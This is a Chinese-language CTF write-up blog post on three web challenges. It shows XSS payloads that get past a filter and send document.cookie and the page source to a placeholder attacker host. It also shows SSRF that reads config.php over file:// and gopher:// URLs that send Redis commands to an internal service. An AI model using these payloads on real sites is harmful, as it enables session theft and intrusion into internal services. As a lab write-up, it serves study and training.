<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="ctf,web,xss,">










<meta name="description" content="最近几场比赛碰到了不少xss，就算看过xss的原理依旧没什么想法，还是找几道题来做比较快，前面的题以后再补上">
<meta name="keywords" content="ctf,web,xss">
<meta property="og:type" content="article">
<meta property="og:title" content="hackme web wp">
<meta property="og:url" content="http://yoursite.com/2019/06/01/hackme-web-wp/index.html">
<meta property="og:site_name" content="k0t0r1の家">
<meta property="og:description" content="最近几场比赛碰到了不少xss，就算看过xss的原理依旧没什么想法，还是找几道题来做比较快，前面的题以后再补上">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hackme_web_wp/6f7ee5a4c8b141c4fabf955168b8e75c.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hackme_web_wp/3a525810d27ffe273e7a183f285d4d9c.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hackme_web_wp/cd09f22408f2f10870cb919695a8e7f7.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hackme_web_wp/7bff793f036fb5a0cfd919decce3482c.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hackme_web_wp/cc578271a72bd65a95e6dff30e56cd5e.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hackme_web_wp/71562baea73b9cb00ee49609aca4ff0f.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hackme_web_wp/fbe5624d17f1007ae0ee742f3d51200e.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hackme_web_wp/e93ccb64f9a72be76e7756258322ca09.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hackme_web_wp/2d9b3f1a8006d21280bdaf415e9a5d19.png">
<meta property="og:image" content="http://shifeng-kaze.cn/blog/hackme_web_wp/ef23d11780fe13df6b7258c331c7aedf.jpg">
<meta property="og:updated_time" content="2019-06-01T07:00:05.412Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="hackme web wp">
<meta name="twitter:description" content="最近几场比赛碰到了不少xss，就算看过xss的原理依旧没什么想法，还是找几道题来做比较快，前面的题以后再补上">
<meta name="twitter:image" content="http://shifeng-kaze.cn/blog/hackme_web_wp/6f7ee5a4c8b141c4fabf955168b8e75c.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/06/01/hackme-web-wp/">





  <title>hackme web wp | k0t0r1の家</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">k0t0r1の家</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/06/01/hackme-web-wp/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="k0t0r1">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="http://shifeng-kaze.cn/blog/head/kotori.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="k0t0r1の家">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">hackme web wp</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-06-01T14:39:23+09:00">
                2019-06-01
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>最近几场比赛碰到了不少xss，就算看过xss的原理依旧没什么想法，还是找几道题来做比较快，前面的题以后再补上</p>
<a id="more"></a>
<h2 id="xssme"><a href="#xssme" class="headerlink" title="xssme"></a>xssme</h2><p>基础获取cookie的xss题<br>登录进去有个发邮箱的界面，题目说要打admin那就给admin发送邮箱。先试了一下<br><code>&lt;script&gt;alert(1)&lt;/script&gt;</code></p>
<p><img src="http://shifeng-kaze.cn/blog/hackme_web_wp/6f7ee5a4c8b141c4fabf955168b8e75c.png" alt=""></p>
<p>提示)和&lt;script被过滤，于是尝试<code>&lt;svg/onload=alert(&#39;1&#39;)&gt;</code></p>
<p><img src="http://shifeng-kaze.cn/blog/hackme_web_wp/3a525810d27ffe273e7a183f285d4d9c.png" alt=""></p>
<p>依旧只过滤了)，<code>&lt;svg/onload=&gt;</code>是可以用的，于是<br><code>&lt;svg/onload=&quot;document.location=&#39;http://ip或域名/?&#39;+document.cookie&quot;&gt;</code><br>把cookie发到xss平台上</p>
<p><img src="http://shifeng-kaze.cn/blog/hackme_web_wp/cd09f22408f2f10870cb919695a8e7f7.png" alt=""></p>
<p>成功打到flag</p>
<h2 id="xssrf-leak"><a href="#xssrf-leak" class="headerlink" title="xssrf leak"></a>xssrf leak</h2><p>这题提示了要去打源码，于是尝试<br><code>&lt;svg/onload=&quot;document.location=&#39;http://ip或域名/?&#39;+bota(document.body.innerhtml)&quot;&gt;</code></p>
<p><img src="http://shifeng-kaze.cn/blog/hackme_web_wp/7bff793f036fb5a0cfd919decce3482c.png" alt=""></p>
<p>提示innerhtml被过滤，那就实体编码一波，然后成功获得源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;li class=&quot;nav-item&quot;&gt;</span><br><span class="line">	&lt;a class=&quot;nav-link&quot; href=&quot;request.php&quot;&gt;Send Request&lt;/a&gt;</span><br><span class="line">&lt;/li&gt;</span><br></pre></td></tr></table></figure>
<p>读源码会发现一个request接口，猜测可能是用来发送请求的，于是再打一波</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=&quot;/request.php&quot; method=&quot;POST&quot;&gt;</span><br><span class="line">	&lt;div class=&quot;form-group&quot;&gt;</span><br><span class="line">		&lt;label for=&quot;url&quot;&gt;URL&lt;/label&gt;</span><br><span class="line">		&lt;textarea name=&quot;url&quot; class=&quot;form-control&quot; id=&quot;url&quot; aria-describedby=&quot;url&quot; placeholder=&quot;URL&quot; rows=&quot;10&quot;&gt;&lt;/textarea&gt;</span><br><span class="line">	&lt;/div&gt;</span><br><span class="line">	&lt;button class=&quot;btn btn-primary&quot;&gt;Send Request&lt;/button&gt;</span><br><span class="line">&lt;/form&gt;</span><br></pre></td></tr></table></figure>
<p>发现可以往这个接口传一个url参数，于是猜测这个url参数在后台可能会使用curl()对其进行访问然后返回给管理员<br>不过不知道该读什么，于是试试看robots.txt看看有没有什么提示</p>
<p><img src="http://shifeng-kaze.cn/blog/hackme_web_wp/cc578271a72bd65a95e6dff30e56cd5e.png" alt=""></p>
<p>提示打config.php，然后可以知道这个服务器是nginx，于是尝试用file协议去读取<code>/var/www/html/config.php</code>。成功打到页面，浏览器打开就有flag</p>
<h2 id="xssrf-redis"><a href="#xssrf-redis" class="headerlink" title="xssrf redis"></a>xssrf redis</h2><p>看题目就是要打redis的题，看wp的大佬们都说要用gopher协议，然而这两个都只是听过没用过，只能从零开始摸了</p>
<p>首先是gopher协议，和普通url协议一样是可以通过ip:port去访问目标应用。不过gopher协议可以在之后接上该应用可用的命令，不过在命令前要加个_<br>比如向80端口发送get请求，就要是<code>gopher://ip:80/_GET/</code></p>
<p>然后redis可以通过info获取信息，key获取键的信息</p>
<p>从上提到flag我们知道redis在25566端口，于是使用上一题的url参数向request.php发送请求对redis进行攻击<br><code>gopher://127.0.0.1:25566/_info%250a_quit</code>(这里%250a是用来分隔命令的)</p>
<p><img src="http://shifeng-kaze.cn/blog/hackme_web_wp/71562baea73b9cb00ee49609aca4ff0f.png" alt=""></p>
<p>得到只有一个key，于是查键名<br><code>gopher://127.0.0.1:25566/_keys%2520*%250a_quit</code></p>
<p><img src="http://shifeng-kaze.cn/blog/hackme_web_wp/fbe5624d17f1007ae0ee742f3d51200e.png" alt=""></p>
<p>键名位flag，然后查flag的类型<br><code>gopher://127.0.0.1:25566/_type%2520flag%250a_quit</code></p>
<p><img src="http://shifeng-kaze.cn/blog/hackme_web_wp/e93ccb64f9a72be76e7756258322ca09.png" alt=""></p>
<p>flag的类型是list，我们不能直接去读，要先去获得list的长度<br><code>gopher://127.0.0.1:25566/_llen%2520flag%250a_quit</code></p>
<p><img src="http://shifeng-kaze.cn/blog/hackme_web_wp/2d9b3f1a8006d21280bdaf415e9a5d19.png" alt=""></p>
<p>得到长度是53位，于是循环读flag<br><code>gopher://127.0.0.1:25566/_lrange%2520flag%25200%252053%250a_quit</code><br>获得的flag是倒序的，于是python处理一下得到flag</p>
<p><img src="http://shifeng-kaze.cn/blog/hackme_web_wp/ef23d11780fe13df6b7258c331c7aedf.jpg" alt=""></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"># ctf</a>
          
            <a href="/tags/web/" rel="tag"># web</a>
          
            <a href="/tags/xss/" rel="tag"># xss</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/05/27/DDCTF2019-web-wp/" rel="next" title="DDCTF2019 web 复现">
                <i class="fa fa-chevron-left"></i> DDCTF2019 web 复现
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/06/21/ciscn2019-web-wp/" rel="prev" title="ciscn2019 web 复现">
                ciscn2019 web 复现 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="http://shifeng-kaze.cn/blog/head/kotori.jpg" alt="k0t0r1">
            
              <p class="site-author-name" itemprop="name">k0t0r1</p>
              <p class="site-description motion-element" itemprop="description">～いらっしゃいません～</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">29</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://shifeng-kaze.cn/" title="shifeng-kaze" target="_blank">shifeng-kaze</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://aluvion.github.io" title="Aluvion" target="_blank">Aluvion</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#xssme"><span class="nav-number">1.</span> <span class="nav-text">xssme</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#xssrf-leak"><span class="nav-number">2.</span> <span class="nav-text">xssrf leak</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#xssrf-redis"><span class="nav-number">3.</span> <span class="nav-text">xssrf redis</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">k0t0r1</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  


  
  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  

</body>
</html>
